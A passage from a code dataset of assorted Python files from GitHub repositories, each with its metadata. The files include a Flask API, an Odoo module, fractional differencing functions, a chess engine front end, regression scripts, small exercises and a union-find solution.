sys.argv[1:])\ndraw_error_animation()","repo_name":"EslamAsfour/PyEZNet","sub_path":"visualization.py","file_name":"visualization.py","file_ext":"py","file_size_in_byte":887,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"75"} +{"seq_id":"22939167857","text":"from flask import Flask, request\nimport pandas as pd\n\ndf = pd.read_csv('./data/services2019.csv')\n\napp = Flask(__name__)\n\n@app.route('/', methods=[\"GET\"])\ndef home():\n return 'this is an API service for MN ICD code details'\n\n@app.route('/preview', methods=[\"GET\"])\ndef preview():\n top10rows = df.head(10)\n result = top10rows.to_json(orient=\"records\")\n return result\n \n@app.route('/icd/', methods=['GET'])\ndef icdcode(value):\n print('value: ', value)\n filtered = df[df['svc_code_ctg'] == value]\n return filtered.to_json(orient=\"records\")\n\n\n\nif __name__ =='__main__':\n app.run(debug=True)","repo_name":"Alexandriaotuare/Vercel-assignment","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":620,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"31175689622","text":"from odoo import models, fields, api, _\n\nclass PurchaseOrder(models.Model):\n\n _inherit = 'purchase.order'\n\n @api.onchange('is_products')\n def _onchange_select_all_products(self):\n if self.is_products:\n self.purchase_out_lines = self.order_line.filtered(lambda line: line.product_id)\n\n # @api.model\n # def create(self, vals):\n # if vals.get('job_order_seq', _('New')) == _('New'):\n # vals['job_order_seq'] = self.env['ir.sequence'].next_by_code('hospital.job.order.sequence') or _('New')\n # result = super(JobOrder, self).create(vals)\n # return result\n\n @api.multi\n def name_get(self):\n res = []\n for field in self:\n res.append((field.id, '%s' % field.job_order_seq))\n return res\n\n job_order_seq = fields.Char(string='Job Order Id', required=True, copy=False,\n readonly=True, index=True, default=lambda self: _('New'))\n order_type = fields.Selection([\n ('J', 'Job Order'),\n ('P', 'Purchase Order')\n ], default='J', string=\"Order Type\")\n is_products = fields.Boolean(string=\"Some Item to be received\")\n purchase_out_lines = fields.One2many('purchase.order.line', 'purchase_out_id', string=\"Purchase Out Lines\")\n have_invoice = fields.Boolean(string=\"Have Invoice\")\n invoice_date = fields.Date(string=\"Invoice Date\")\n invoice_number = fields.Text(string=\"Invoice Number\")\n\n\n@api.model\ndef create(self, vals):\n if vals.get('name', 'New') == 'New':\n if vals.get('job_order_seq') == True:\n vals['name'] = self.env['ir.sequence'].next_by_code('hospital.job.order.sequence') or _('New')\n else:\n vals['name'] = self.env['ir.sequence'].next_by_code('purchase.order') or '/'\n return super(PurchaseOrder, self).create(vals)\n\n\nclass PurchaseOrderLineInherit(models.Model):\n _inherit = 'purchase.order.line'\n\n @api.model\n def create(self, vals):\n if 'order_id' not in vals:\n vals['order_id'] = self._context.get('order_id')\n return super(PurchaseOrderLineInherit, self).create(vals)\n\n @api.onchange('product_id')\n def _onchange_product_id(self):\n return {'domain': {'product_id': [('type', 'in', ('product', 'service'))]}}\n\n purchase_out_id = fields.Many2one('purchase.order', string=\"Purchase Out\")\n order_id = fields.Many2one('purchase.order', string='Purchase Order', required=True, 
ondelete='cascade')","repo_name":"KasimPythonCodes/odoo_setup_code","sub_path":"addons/om_hospital/models/purchase_order.py","file_name":"purchase_order.py","file_ext":"py","file_size_in_byte":2458,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"}
+{"seq_id":"29585684568","text":"import pandas as pd\nimport numpy as np\n\ndef get_weights(d, size):\n    w = [1.]\n    for k in range(1, size):\n        w_ = -w[-1]/k*(d-k+1)\n        w.append(w_)\n    w = np.array(w[::-1]).reshape(-1, 1)\n    return w\n\ndef frac_diff(series, d, thres=.01):\n    '''\n    Increasing width window, with treatment of NaNs\n    Note 1: For thres=1, nothing is skipped.\n    Note 2: d can be any positive fractional, not necessarily bounded [0,1].\n    '''\n    # 1) compute weights for the longest series\n    w = get_weights(d, series.shape[0])\n    # 2) determine initial calcs to be skipped based on weight-loss threshold\n    w_ = np.cumsum(abs(w))\n    w_ /= w_[-1]\n    skip = w_[w_>thres].shape[0]\n    # 3) apply weights to values\n    df = {}\n    for name in series.columns:\n        series_f = series[[name]].fillna(method='ffill').dropna()\n        df_ = pd.Series()\n        for iloc in range(skip, series_f.shape[0]):\n            loc = series_f.index[iloc]\n            if not np.isfinite(series.loc[loc, name]):\n                continue  # exclude NaNs\n            df_[loc] = np.dot(w[-(iloc+1):, :].T, series_f.loc[:loc])[0, ]\n        df[name] = df_.copy(deep=True)\n    df = pd.concat(df, axis=1)\n    return df\n\ndef frac_diff_fast(series, d):\n    # from: https://github.com/philipperemy/fractional-differentiation-time-series/blob/master/fracdiff/fracdiff.py\n    df = {}\n    for name in series.columns:\n        series_f = series[[name]].fillna(method='ffill').dropna()\n        x = series_f.values\n        T = len(x)\n        np2 = int(2 ** np.ceil(np.log2(2 * T - 1)))\n        k = np.arange(1, T)\n        b = np.append([1], np.cumprod((k - d - 1) / k))\n        z = np.zeros(np2 - T)\n        z1 = np.append(b, z)\n        z2 = np.append(x, z)\n        dx = np.fft.ifft(np.fft.fft(z1) * np.fft.fft(z2))\n        dx = np.real(dx[0:T])\n        df[name] = pd.Series(dx, index=series_f.index)\n    df = pd.concat(df, axis=1)\n    return df\n","repo_name":"jfuechsl/fml_fast","sub_path":"fracdiff/expanding.py","file_name":"expanding.py","file_ext":"py","file_size_in_byte":1915,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"}
+{"seq_id":"74238229041","text":"# Calculate the number pi to a given accuracy d\n\n# Example:\n\n# - for $d = 0.001, π = 3.141.$ $10^{-1} ≤ d ≤ 10^{-10}$\n\n\n# Bailey–Borwein–Plouffe formula\n# pi = sum(1/16^n * (4/(8*n+1) - 2/(8*n+4) - 1/(8*n+5) - 1/(8*n+6)))\n\n\n\n\ndef f(n):\n    return (1 / 16 ** n) * ((4 / (8 * n + 1)) - (2 / (8 * n + 4)) - (1 / (8 * n + 5)) - (1/ (8 * n + 6)))\n\ndef round_up(number: float, accuracy: str) -> float:\n    accuracy = len(accuracy.split('.')[1])\n    divider = 1\n    for i in range(accuracy):\n        divider *= 10\n\n    return number * divider // 1 / divider\n\n\naccuracy = input(\"Enter the required accuracy: \").replace(\",\", \".\")\nn = 0\nresult = 0\nswitch = True\nwhile switch:\n\n    if (f(n - 1) - f(n)) > float(accuracy):\n        result += f(n)\n        n += 1\n    else:\n        switch = False\n\n\nprint(round_up(result, accuracy))\n","repo_name":"bannik-git/python_lesson","sub_path":"Homework/Seminar_4/001_calculation_accuracy.py","file_name":"001_calculation_accuracy.py","file_ext":"py","file_size_in_byte":935,"program_lang":"python","lang":"ru","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"}
+{"seq_id":"30618364736","text":"import re\n\nfrom ming.odm import ThreadLocalODMSession\nfrom pylons import app_globals as g\n\nfrom 
vulcanforge.artifact.model import ArtifactReference, Shortlink\nfrom vulcanforge.discussion.model import Discussion\nfrom vulcanforge.project.model import AppConfig\n\n\ndef remove_deprecated_ac(ac):\n g.solr.delete(q='app_config_id_s:\"{}\"'.format(ac._id))\n d_cur = Discussion.query.find({\"app_config_id\": ac._id})\n for d in d_cur:\n d.delete()\n ArtifactReference.query.remove({\n 'artifact_reference.app_config_id': ac._id})\n Shortlink.query.remove({'app_config_id': ac._id})\n ac.delete()\n ThreadLocalODMSession.flush_all()\n\n\ndef remove_all_deprecated():\n cur = AppConfig.query.find({\n 'tool_name': {\n \"$nin\": [re.compile(ep, re.I) for ep in g.tool_manager.tools]\n }\n })\n for ac in cur:\n remove_deprecated_ac(ac)\n\n\nif __name__ == '__main__':\n remove_all_deprecated()\n","repo_name":"vulcan-collaboration/vulcanforge","sub_path":"scripts/remove_deprecated_apps.py","file_name":"remove_deprecated_apps.py","file_ext":"py","file_size_in_byte":935,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"75187614323","text":"\"\"\"\nRuns regressions of model results on individual characteristics\n\"\"\"\nimport estimagic.visualization.estimation_table as et\nimport pandas as pd\nimport pytask\nimport statsmodels.formula.api as smf\n\nfrom ambig_beliefs.final.utils_final import col_name_to_proper_name\nfrom ambig_beliefs.final.utils_final import put_reg_sample_together\nfrom ambig_beliefs.final.utils_final import variable_to_proper_name\nfrom config import BASIC_CONTROLS\nfrom config import MODEL_SPECS\nfrom config import NAMES_INDICES_SPEC\nfrom config import NAMES_MAIN_SPEC\nfrom config import NAMES_ROBUSTNESS_SPEC\nfrom config import OUT_ANALYSIS\nfrom config import OUT_DATA\nfrom config import OUT_DATA_LISS\nfrom config import OUT_TABLES\nfrom config import OUT_UNDER_GIT\n\n\ndef make_formula(y, X):\n regs = \" + \".join(X)\n return f\"{y} ~ {regs}\"\n\n\ndef make_mnlogit_table(\n mod,\n):\n params = mod.params\n se = mod.bse\n k = mod.params.shape[1] + 1\n\n table = pd.DataFrame(\n index=range(params.index.shape[0] * 2 + 2),\n columns=[\"variable\"] + [f\"Group 0 v Group {g+1}\" for g in range(k - 1)],\n )\n for i, v in enumerate(params.index):\n i_coef = i * 2\n i_se = i_coef + 1\n table.iloc[i_coef, 0] = v\n table.iloc[i_se, 0] = \"\"\n\n for j in range(k - 1):\n table.iloc[i_coef, j + 1] = f\"{params.iloc[i, j]:.2f}\"\n table.iloc[i_se, j + 1] = f\"({se.iloc[i, j]:.2f})\"\n\n for j in range(k - 1):\n table.iloc[-1, j + 1] = f\"{mod.prsquared:.2f}\"\n table.iloc[-2, j + 1] = mod.nobs\n\n table.iloc[-1, 0] = \"Pseudo $R^2$\"\n table.iloc[-2, 0] = \"N\"\n table.set_index(\"variable\", inplace=True)\n table.index.name = \"\"\n return table\n\n\ndef reg_para_on_ind_chars(df, params, controls, cluster_var, path_out):\n df = df.copy().reset_index()\n col_name_to_proper_name = {\n \"ambig_av\": r\"$\\alpha^{AEX}$\",\n \"ambig_av_index\": r\"$\\alpha^{AEX}_\\text{BBLW-Index}$\",\n \"ll_insen\": r\"$\\ell^{AEX}$\",\n \"ll_insen_index\": r\"$\\ell^{AEX}_\\text{BBLW-Index}$\",\n \"theta\": r\"$\\sigma^{AEX}$\",\n }\n\n # Make regression table that also includes columns on subset\n def run_one_reg(y, sel, models):\n f = make_formula(y=y, X=controls)\n if cluster_var:\n mod = smf.ols(formula=f, data=sel).fit(\n cov_type=\"cluster\", cov_kwds={\"groups\": sel[cluster_var]}\n )\n else:\n mod = smf.ols(formula=f, data=sel).fit(cov_type=\"HC3\")\n models.append(mod)\n return models\n\n models = []\n for para in params:\n models = 
run_one_reg(para, df, models)\n\n # for para in params:\n # # duplicate dependent variable to avoid estimagic error: \"If there are\n # # repetitions in model_names, models with the same name need to be\n # # adjacent.\"\n # df[f\"{para}_1\"] = df[para]\n # models = run_one_reg(f\"{para}_1\", df.query(\"all_indices_valid\"), models)\n\n # for para in params:\n # # duplicate dependent variable to avoid estimagic error: \"If there are\n # # repetitions in model_names, models with the same name need to be\n # # adjacent.\"\n # df[f\"{para}_2\"] = df[para]\n # models = run_one_reg(\n # f\"{para}_2\",\n # df.query(\"at_least_2_waves_with_valid_choice_and_index\"),\n # models,\n # )\n\n out = et.estimation_table(\n models,\n return_type=\"render_inputs\",\n add_trailing_zeros=False,\n siunitx_warning=False,\n custom_param_names=variable_to_proper_name,\n custom_col_names={\n **col_name_to_proper_name,\n # **\n },\n # custom_col_groups=[\"Full Sample\"] * len(params)\n # + [\"All BBLW-indices valid\"] * len(params)\n # + [\"At least two waves with valid BBLW-indices\"] * len(params),\n number_format=(\"{0:.2g}\", \"{0:.4f}\", \"{0:.4g}\"),\n stats_options={\n \"n_obs\": \"Observations\",\n \"rsquared_adj\": \"Adj. R$^2$\",\n \"show_dof\": None,\n },\n )\n\n col_renaming = {\n **{f\"{para}_1\": col_name_to_proper_name[para] for para in params},\n **{f\"{para}_2\": col_name_to_proper_name[para] for para in params},\n }\n out[\"body\"] = out[\"body\"].rename(columns=col_renaming)\n out[\"footer\"] = out[\"footer\"].rename(columns=col_renaming)\n out_latex = et.render_latex(\n out[\"body\"],\n out[\"footer\"],\n append_notes=False,\n show_footer=True,\n siunitx_warning=False,\n escape_special_characters=False,\n )\n with open(path_out, \"w\") as my_table:\n my_table.write(out_latex)\n\n\ndef reg_risk_numeracy_on_controls(df, path_out):\n risk_num_controls = [c for c in BASIC_CONTROLS if \"risk\" in c or \"numeracy\" in c]\n non_risk_num_controls = [c for c in BASIC_CONTROLS if c not in risk_num_controls]\n models = []\n for y in risk_num_controls:\n f = make_formula(y=y, X=non_risk_num_controls)\n mod = smf.ols(formula=f, data=df).fit(cov_type=\"HC3\")\n models.append(mod)\n\n out = et.estimation_table(\n models,\n return_type=\"latex\",\n add_trailing_zeros=False,\n siunitx_warning=False,\n custom_param_names=variable_to_proper_name,\n custom_col_names=col_name_to_proper_name,\n number_format=(\"{0:.2g}\", \"{0:.4f}\", \"{0:.4g}\"),\n stats_options={\n \"n_obs\": \"Observations\",\n \"rsquared_adj\": \"Adj. 
R$^2$\",\n \"show_dof\": None,\n },\n escape_special_characters=False,\n )\n with open(path_out, \"w\") as my_table:\n my_table.write(out)\n\n\nPARAMETRIZATION = {}\nfor m in NAMES_MAIN_SPEC + NAMES_ROBUSTNESS_SPEC + NAMES_INDICES_SPEC:\n depends_on = {\n \"individual\": OUT_DATA / \"individual.pickle\",\n \"sample_restrictions\": OUT_DATA / \"sample_restrictions.pickle\",\n \"indices\": OUT_DATA_LISS / \"ambiguous_beliefs\" / \"indices.pickle\",\n \"utils_final\": \"utils_final.py\",\n \"group_assignments\": OUT_ANALYSIS / f\"group_assignments_{m}.pickle\",\n \"group_stats\": OUT_ANALYSIS / f\"group_stats_{m}.pickle\",\n \"pat_rec_and_dur_restrictions\": OUT_DATA\n / \"pat_rec_and_dur_restrictions.pickle\",\n }\n if not MODEL_SPECS[m][\"indices_params\"]:\n depends_on[MODEL_SPECS[m][\"est_model_name\"]] = (\n OUT_UNDER_GIT\n / MODEL_SPECS[m][\"est_model_name\"]\n / \"opt_diff_evolution\"\n / \"results.pickle\"\n )\n produces = {\n \"model_comp_on_chars\": OUT_TABLES\n / m\n / (\"model_comp_on_chars\" + MODEL_SPECS[m][\"asset_calc\"] + \".tex\"),\n \"additional_vars_on_chars\": OUT_TABLES\n / m\n / (\"additional_vars_on_chars\" + \".tex\"),\n }\n PARAMETRIZATION[m] = {\n \"depends_on\": depends_on,\n \"produces\": produces,\n \"model_spec\": MODEL_SPECS[m],\n }\n\nfor m, kwargs in PARAMETRIZATION.items():\n\n @pytask.mark.task(id=m)\n def task_reg_model_comps_on_ind_chars(\n depends_on=kwargs[\"depends_on\"],\n produces=kwargs[\"produces\"],\n model_spec=kwargs[\"model_spec\"],\n ):\n models = (\n model_spec[\"wbw_models\"]\n if model_spec[\"indices_params\"]\n else [model_spec[\"est_model_name\"]]\n )\n df = put_reg_sample_together(\n in_path_dict=depends_on,\n asset_calc=model_spec[\"asset_calc\"],\n restrictions=model_spec[\"restrictions\"],\n models=models,\n indices=model_spec[\"indices_params\"],\n indices_mean=model_spec.get(\"indices_mean\"),\n )\n\n controls = BASIC_CONTROLS\n if model_spec[\"indices_params\"]:\n params = [\"ambig_av\", \"ll_insen\"]\n else:\n params = [\"ambig_av\", \"ll_insen\", \"theta\"]\n\n df = df[params + controls].dropna()\n\n # Merge indicator whether indices are valid\n pat_rec_dur = pd.read_pickle(depends_on[\"pat_rec_and_dur_restrictions\"])\n indices_single_waves = put_reg_sample_together(\n in_path_dict=depends_on,\n asset_calc=model_spec[\"asset_calc\"],\n restrictions=model_spec[\"restrictions\"],\n models=list(range(1, 7)),\n indices=True,\n indices_mean=False,\n )\n\n indices_single_waves[\"valid_indices\"] = (\n (indices_single_waves[\"ll_insen\"] <= 1)\n & (\n -indices_single_waves[\"ll_insen\"]\n <= indices_single_waves[\"ambig_av\"] * 2\n )\n & (indices_single_waves[\"ambig_av\"] * 2 <= indices_single_waves[\"ll_insen\"])\n )\n temp = indices_single_waves.groupby(\"personal_id\")[\"valid_indices\"].all()\n temp.name = \"all_indices_valid\"\n df = df.join(temp)\n\n indices_single_waves = indices_single_waves.join(pat_rec_dur[\"valid_choice\"])\n indices_single_waves[\"valid_choice_and_index\"] = (\n indices_single_waves[\"valid_choice\"] & indices_single_waves[\"valid_indices\"]\n )\n temp = (\n indices_single_waves.groupby(\"personal_id\")[\"valid_choice_and_index\"].sum()\n >= 2\n )\n temp.name = \"at_least_2_waves_with_valid_choice_and_index\"\n df = df.join(temp)\n cluster_var = (\n \"personal_id\"\n if (model_spec[\"indices_params\"] and not model_spec[\"indices_mean\"])\n else None\n )\n # controls = [c for c in controls if \"numeracy\" not in c]\n\n reg_para_on_ind_chars(\n df,\n params,\n controls,\n cluster_var,\n 
produces[\"model_comp_on_chars\"],\n )\n\n # Also regress risk_aversion and numeracy on characteristics\n reg_risk_numeracy_on_controls(df, produces[\"additional_vars_on_chars\"])\n","repo_name":"ChristianZimpelmann/replication-ambig-beliefs","sub_path":"ambig_beliefs/final/task_reg_model_comps_on_ind_chars.py","file_name":"task_reg_model_comps_on_ind_chars.py","file_ext":"py","file_size_in_byte":9735,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"32050036460","text":"# To add a new cell, type '# %%'\n# To add a new markdown cell, type '# %% [markdown]'\n# %% [markdown]\n# ## Setup spark and dbutils. Some shortcuts are in library.config\n\n# %%\nfrom library import config\n\nspark, dbutils = config.setup_environment()\n\n\n# %%\ndef displaydf(df):\n display(df.limit(1000).toPandas()) \n\n\n# %%\n# It works!\n\ndisplaydf(\n spark.sql(\"select 1\")\n)\n\n# %% [markdown]\n# ## Use part of the dbutils library\n\n# %%\n# Use dbutils.fs\ndbutils.fs.ls(\"/\")\n\n\n# %%\n# Use dbutils.secrets. First time you will need to follow the steps.\ndbutils.secrets.get(\"secret-scope\", \"secret\")\n\n# %% [markdown]\n# ## Use custom transformations defined in library\n\n# %%\ndf = spark.createDataFrame([[1, 2], [3, 4]]).toDF(\"x\", \"y\")\n\ndisplaydf(df)\n\n\n# %%\nfrom library import transformations\n\ndisplaydf(\n df.transform(transformations.add)\n)\n\n# %%\n","repo_name":"pblocz/databricks-connect-python-template","sub_path":"notebooks/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":838,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"22012775049","text":"import gspread\r\nfrom oauth2client.service_acount import ServiceAccountCredentials\r\nimport pprint\r\nimport spreadsheets\r\nimport sqlite3\r\n\r\nscope = ['https://spreadsheets.google.com/feeds']\r\ncreds = ServiceAccountCredentials.from_json_keyfile_name('UserSearch-d26bd5aa4998.json', scope)\r\nclient = gspread.authorize(creds)\r\n\r\nsheet = client.open('User_Search').sheet1\r\n\r\npp = pprint.PrettyPrinter()\r\nall_data = get_all_records()\r\n\r\n#finds the total number of rows (entries) entered in the first column\r\nnum = len(sheet.col_values(1))\r\n\r\n#finds the results from the latest row entry\r\nresult = sheet.row_values(num)\r\n\r\n#espablishing connection to database\r\nconnection = sqlite3.connect(\"people.db\")\r\n\r\n#creatinc cursor\r\ncrsr = connection.cursor()\r\n\r\n\r\nimport unichoice as u_lan\r\nimport subjectandlang_chosen as s_lan\r\nimport countryandlang_chosen as c_lan\r\nimport languagechosenonly as o_lan\r\n\r\nif (result[3] != \"na\"):\r\n\tif (result[2] != \"na\"):\r\n\t\tcrsr.execute(c_lan)\r\n\telif(result[1] != \"NONE\"):\r\n\t\tcrsr.execute(s_lan)\r\n\telif(result[0] != \"NONE\"):\r\n\t\tcrsr.execute(u_lan)\r\n\telse:\r\n\t\tcrsr.execute(o_lan)\r\n\r\nconnection.commit()\r\nconnection.close()\r\n\r\n","repo_name":"jinthespaceguy/coeus","sub_path":"data_sorting.py","file_name":"data_sorting.py","file_ext":"py","file_size_in_byte":1143,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"70565766644","text":"import chess\nfrom chess import InvalidMoveError\nimport search\nfrom nn.model import nnEval_model_halfKP, halfKP_Net\nCOLOR_TABLE = {\n 0: 'Black',\n 1: 'White'\n}\n\n\ndef getMove(board: chess.Board) -> chess.Move:\n move = input(\"Enter your move in UCI format. eg. 
g1f3| q to quit \")\n if move == 'q':\n return move\n # Checks if move is in valid UCI format\n try:\n move = chess.Move.from_uci(move)\n except InvalidMoveError:\n print('Invalid move.')\n move = getMove(board)\n\n if move not in board.legal_moves:\n print('Illegal move')\n move = getMove(board)\n\n return move\n\ndef evaluation_from_FEN():\n fen = input(\"Input FEN: \")\n depth = int(input('Input depth of engine search. (Integer): '))\n qs_depth = int(input('Input quiescence search depth. (Integer): '))\n\n board = chess.Board(fen=fen)\n halfkp_chkpt = './nn/lightning_logs/version_2/checkpoints/epoch=67-step=215152.ckpt'\n halfkp_model = nnEval_model_halfKP.load_from_checkpoint(halfkp_chkpt, net=halfKP_Net(40960, 256, 64, 64))\n net = halfkp_model.net\n searcher = search.SearcherNNUE(net)\n evaluation, move = searcher.search(board, depth, qs_depth)\n print(f'Evaluation: {evaluation.item()}| Best move: {move.uci()}')\n\n# Litterally 1-8 but as strings\nONETOEIGHT = list(map(str,range(1,9)))\n\ndef printBoard(board: chess.Board, perspective):\n board, *_ = board.fen().split()\n board = board.split('/')\n for i, col in enumerate(board) if perspective == 1 else list(enumerate(board))[::-1]: # iterate through board upside down if black\n print(8 - i, end='') # print row number\n for piece in col if perspective == 1 else col[::-1]: # columns also have to be reversed if black since board is rotated\n if piece in ONETOEIGHT:\n # print number times \" .\"\n print(int(piece) * \" ·\", end='')\n else:\n # print unicode representation of piece\n print(f' {chess.UNICODE_PIECE_SYMBOLS[piece]}', end='')\n\n print()\n AtoH = [chr(i) for i in range(65, 73)]\n print(\" \" + \" \".join(AtoH if perspective == 1 else AtoH[::-1])) # prints column letters\n\n\ndef main():\n fen = input(\"Enter starting board FEN. Press Enter to start normally. \")\n depth = int(input('Input depth of engine search. (Integer): '))\n qs_depth = int(input('Input quiescence search depth. (Integer): '))\n # Get player side\n player_side = input(\"Enter side to move. (1)white (0)black: \")\n while not (player_side == '0' or player_side == '1'):\n player_side = input(\"Enter side to move. (1)white (0)black: \")\n player_side = int(player_side)\n # Initilise board object\n if fen:\n board = chess.Board(fen)\n else:\n board = chess.Board()\n\n # Initialize model and searcher \n halfkp_chkpt = './nn/lightning_logs/version_2/checkpoints/epoch=67-step=215152.ckpt'\n halfkp_model = nnEval_model_halfKP.load_from_checkpoint(halfkp_chkpt, net=halfKP_Net(40960, 256, 64, 64))\n net = halfkp_model.net\n searcher = search.SearcherNNUE(net)\n\n printBoard(board, player_side)\n while True:\n # If player to move get move from player\n if board.turn == player_side:\n move = getMove(board)\n\n else: # Otherwise use engine move\n evaluation, move = searcher.search(board, depth, qs_depth)\n print(f'Evaluation: {evaluation.item()}')\n\n if move == 'q':\n break\n\n board.push(move) # play move\n printBoard(board, player_side)\n\n if board.is_checkmate():\n print(COLOR_TABLE[1 - board.turn], 'wins')\n break\n\n if board.is_stalemate():\n print('Draw')\n break\n \n print(f'End board FEN: {board.fen()}')\n\n\nif __name__ == '__main__':\n main()\n\n \n\n\n","repo_name":"DuffyMoby/ChessNEA","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3831,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"73024201523","text":"# Задача 14. 
Write a program that takes a real number as input\n# and shows the sum of its digits.\n\n# Example:\n# - 6782 -> 23\n# - 0,56 -> 11\n\nR = float(input(\"Enter a real number: \"))\nsave = R\nR = abs(R)  # in case a negative number is entered\n\nwhile not R.is_integer():  # turn the fraction into an integer\n    R *= 10\n\nsumm = 0\nwhile (R > 0):\n    summ += R % 10  # add up the digits\n    R = R // 10\n\nprint(f'The sum of the digits of {save} is {int(summ)}')\n","repo_name":"Zep314/PyHW02","sub_path":"task01.py","file_name":"task01.py","file_ext":"py","file_size_in_byte":646,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"}
+{"seq_id":"711657508","text":"import os\nimport sys\nimport time\nimport math\nfrom datetime import datetime\nimport random\nimport logging\nfrom collections import OrderedDict\nimport numpy as np\nimport cv2\nimport torch\nfrom torchvision.utils import make_grid\nfrom shutil import get_terminal_size\n\nimport yaml\ntry:\n    from yaml import CLoader as Loader, CDumper as Dumper\nexcept ImportError:\n    from yaml import Loader, Dumper\n\n\ndef OrderedYaml():\n    '''yaml orderedDict support'''\n    _mapping_tag = yaml.resolver.BaseResolver.DEFAULT_MAPPING_TAG\n\n    def dict_representer(dumper, data):\n        return dumper.represent_dict(data.items())\n\n    def dict_constructor(loader, node):\n        return OrderedDict(loader.construct_pairs(node))\n\n    Dumper.add_representer(OrderedDict, dict_representer)\n    Loader.add_constructor(_mapping_tag, dict_constructor)\n    return Loader, Dumper\n\n\n####################\n# miscellaneous\n####################\n\n\ndef get_timestamp():\n    return datetime.now().strftime('%y%m%d-%H%M%S')\n\n\ndef mkdir(path):\n    if not os.path.exists(path):\n        os.makedirs(path)\n\n\ndef mkdirs(paths):\n    if isinstance(paths, str):\n        mkdir(paths)\n    else:\n        for path in paths:\n            mkdir(path)\n\n\ndef mkdir_and_rename(path):\n    if os.path.exists(path):\n        new_name = path + '_archived_' + get_timestamp()\n        print('Path already exists. Rename it to [{:s}]'.format(new_name))\n        logger = logging.getLogger('base')\n        logger.info('Path already exists. 
Rename it to [{:s}]'.format(new_name))\n os.rename(path, new_name)\n os.makedirs(path)\n\n\ndef set_random_seed(seed):\n random.seed(seed)\n np.random.seed(seed)\n torch.manual_seed(seed)\n torch.cuda.manual_seed_all(seed)\n\n\ndef setup_logger(logger_name, root, phase, level=logging.INFO, screen=False, tofile=False):\n '''set up logger'''\n lg = logging.getLogger(logger_name)\n formatter = logging.Formatter('%(asctime)s.%(msecs)03d - %(levelname)s: %(message)s',\n datefmt='%y-%m-%d %H:%M:%S')\n lg.setLevel(level)\n if tofile:\n log_file = os.path.join(root, phase + '_{}.log'.format(get_timestamp()))\n fh = logging.FileHandler(log_file, mode='w')\n fh.setFormatter(formatter)\n lg.addHandler(fh)\n if screen:\n sh = logging.StreamHandler()\n sh.setFormatter(formatter)\n lg.addHandler(sh)\n\n\n####################\n# Pytorch Tensor <-> state\n####################\ndef state2tensor(state):\n \"\"\"\n :param state: numpy array (NHWC), 10 bit\n :return: Pytorch Tensor (NCHW)\n \"\"\"\n state = state.copy().astype(np.float32) / 1023.\n tensor = torch.Tensor(np.transpose(state, [0, 3, 1, 2]))\n return tensor\n\n\ndef tensor2state(tensor):\n \"\"\"\n :param tensor: Pytorch Tensor (NCHW)\n :return: numpy array (NHWC), 10 bit\n \"\"\"\n state = np.transpose(tensor.numpy().copy(), [0, 2, 3, 1])\n state *= 1023\n state = state.astype(np.int16)\n state = np.maximum(state, 0) # <0 may cause error while processing\n return state\n\n\ndef tensor2bgr(tensor, is_uint8=True):\n \"\"\"\n :param tensor: 1CHW tensor [0., 1.]\n :param is_uint8: whether to output uint8 (if not, output original dtype)\n :return: BGR image [0, 255] if is_uint8 else [0., 1.]\n \"\"\"\n image = tensor.detach().cpu().numpy()\n if image.ndim == 4:\n image = image[0]\n image = np.transpose(image, axes=[1, 2, 0]) # HWC, BGR image\n\n if is_uint8:\n image = np.clip(image * 255, 0, 255)\n image = image.astype(np.uint8)\n else:\n pass\n\n return image.copy()\n\n\n####################\n# Metric (e.g., PSNR)\n####################\ndef psnr(img1, img2):\n # 10 bit image\n if img1.dtype == np.int16:\n img1 = img1.astype(np.float32) / 1023.\n if img1.dtype == np.uint8:\n img1 = img1.astype(np.float32) / 255.\n if img2.dtype == np.int16:\n img2 = img2.astype(np.float32) / 1023.\n if img2.dtype == np.uint8:\n img2 = img2.astype(np.float32) / 255.\n\n mse = (img1 - img2) ** 2\n mse = mse.mean()\n return 10 * math.log10(1. 
/ mse)\n","repo_name":"yuke93/ReconfigISP","sub_path":"codes/utils/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":4060,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"75"}
+{"seq_id":"23788944317","text":"class UF:\n    def __init__(self, n):\n        self.parent = list(range(n))\n        self.size = [1] * n\n        self.cnt = n\n\n    def find(self, x):\n        if x != self.parent[x]:\n            self.parent[x] = self.find(self.parent[x])\n            return self.parent[x]\n        return x\n    def union(self, x,y):\n        x, y = self.find(x), self.find(y)\n        if x == y:\n            return False\n        if self.size[x] < self.size[y]:\n            x, y = y, x\n        self.parent[y] = x\n        self.size[x] += self.size[y]\n        self.cnt -= 1\n        return True\n\n    def connected(self, x, y):\n        x, y = self.find(x), self.find(y)\n        return x == y\n\nclass Solution:\n    def maxNumEdgesToRemove(self, n, edges):\n        ufa, ufb = UF(n), UF(n)\n        ans = 0\n\n        # renumber nodes to start from 0\n        for edge in edges:\n            edge[1] -= 1\n            edge[2] -= 1\n\n        # shared edges\n        for t, u, v in edges:\n            if t == 3:\n                if not ufa.union(u, v):\n                    ans += 1\n                else:\n                    ufb.union(u, v)\n\n        # exclusive edges\n        for t, u, v in edges:\n            if t == 1:\n                # Alice's exclusive edges\n                if not ufa.union(u, v):\n                    ans += 1\n            elif t == 2:\n                # Bob's exclusive edges\n                if not ufb.union(u, v):\n                    ans += 1\n\n        if ufa.cnt != 1 or ufb.cnt != 1:\n            return -1\n        return 